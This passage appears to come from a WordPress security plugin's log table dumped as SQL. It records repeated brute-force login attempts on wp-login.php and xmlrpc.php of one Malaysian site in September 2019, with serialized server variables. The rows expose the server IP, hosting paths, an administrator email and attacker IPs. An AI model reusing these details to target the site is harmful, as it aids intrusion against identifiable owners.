Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"55204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW52t4PBR0Qpy6701ff5LgAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567520439.5864\";s:12:\"REQUEST_TIME\";s:10:\"1567520439\";}}','notice','2019-09-03 14:20:41','2019-09-03 14:20:40',18203040,19500000,'https://bintara.com.my/xmlrpc.php',1,0,'93.114.86.226'),(23619,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.52.44\";s:11:\"REMOTE_PORT\";s:5:\"60936\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW56TYPBR0Qpy6701ff7lgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567521357.7579\";s:12:\"REQUEST_TIME\";s:10:\"1567521357\";}}','notice','2019-09-03 14:35:59','2019-09-03 14:35:58',17685304,19175840,'https://bintara.com.my/wp-login.php',1,0,'37.59.52.44'),(23620,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.52.44\";s:11:\"REMOTE_PORT\";s:5:\"33200\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW56UIPBR0Qpy6701ff7mAAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567521360.9451\";s:12:\"REQUEST_TIME\";s:10:\"1567521360\";}}','notice','2019-09-03 14:36:02','2019-09-03 14:36:01',18202072,19501616,'https://bintara.com.my/xmlrpc.php',1,0,'37.59.52.44'),(23621,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"145.239.180.96\";s:11:\"REMOTE_PORT\";s:5:\"59366\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5@9IPBR0Qpy6701ff@xAAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567522548.6771\";s:12:\"REQUEST_TIME\";s:10:\"1567522548\";}}','notice','2019-09-03 14:55:49','2019-09-03 14:55:49',17683576,19175168,'https://bintara.com.my/wp-login.php',1,0,'145.239.180.96'),(23622,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"145.239.180.96\";s:11:\"REMOTE_PORT\";s:5:\"59682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5@9yb-UXmq9MAQufFVZwAAANg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1567522551.56\";s:12:\"REQUEST_TIME\";s:10:\"1567522551\";}}','notice','2019-09-03 14:55:53','2019-09-03 14:55:52',18202952,19503472,'https://bintara.com.my/xmlrpc.php',1,0,'145.239.180.96'),(23617,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"54868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW52tIPBR0Qpy6701ff5LAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567520436.3815\";s:12:\"REQUEST_TIME\";s:10:\"1567520436\";}}','notice','2019-09-03 14:20:37','2019-09-03 14:20:36',17688640,19179816,'https://bintara.com.my/wp-login.php',1,0,'93.114.86.226'),(23616,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"177.21.15.122\";s:11:\"REMOTE_PORT\";s:5:\"56462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5lqSb-UXmq9MAQufFSbQAAAMk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567516073.5094\";s:12:\"REQUEST_TIME\";s:10:\"1567516073\";}}','notice','2019-09-03 13:07:56','2019-09-03 13:07:54',18203432,19503008,'https://bintara.com.my/xmlrpc.php',1,0,'177.21.15.122'),(23615,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.143.78\";s:11:\"REMOTE_PORT\";s:5:\"53240\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5dMfvBZa9wQiMAqP3SMAAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567513905.4653\";s:12:\"REQUEST_TIME\";s:10:\"1567513905\";}}','notice','2019-09-03 12:31:51','2019-09-03 12:31:46',18205784,19504216,'https://bintara.com.my/xmlrpc.php',1,0,'148.66.143.78'),(23614,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.143.78\";s:11:\"REMOTE_PORT\";s:5:\"51228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5dKBTPYOiG2TtxVKoIIAAAAVA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567513896.5698\";s:12:\"REQUEST_TIME\";s:10:\"1567513896\";}}','notice','2019-09-03 12:31:43','2019-09-03 12:31:37',17688480,19179072,'https://bintara.com.my/wp-login.php',1,0,'148.66.143.78'),(23613,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 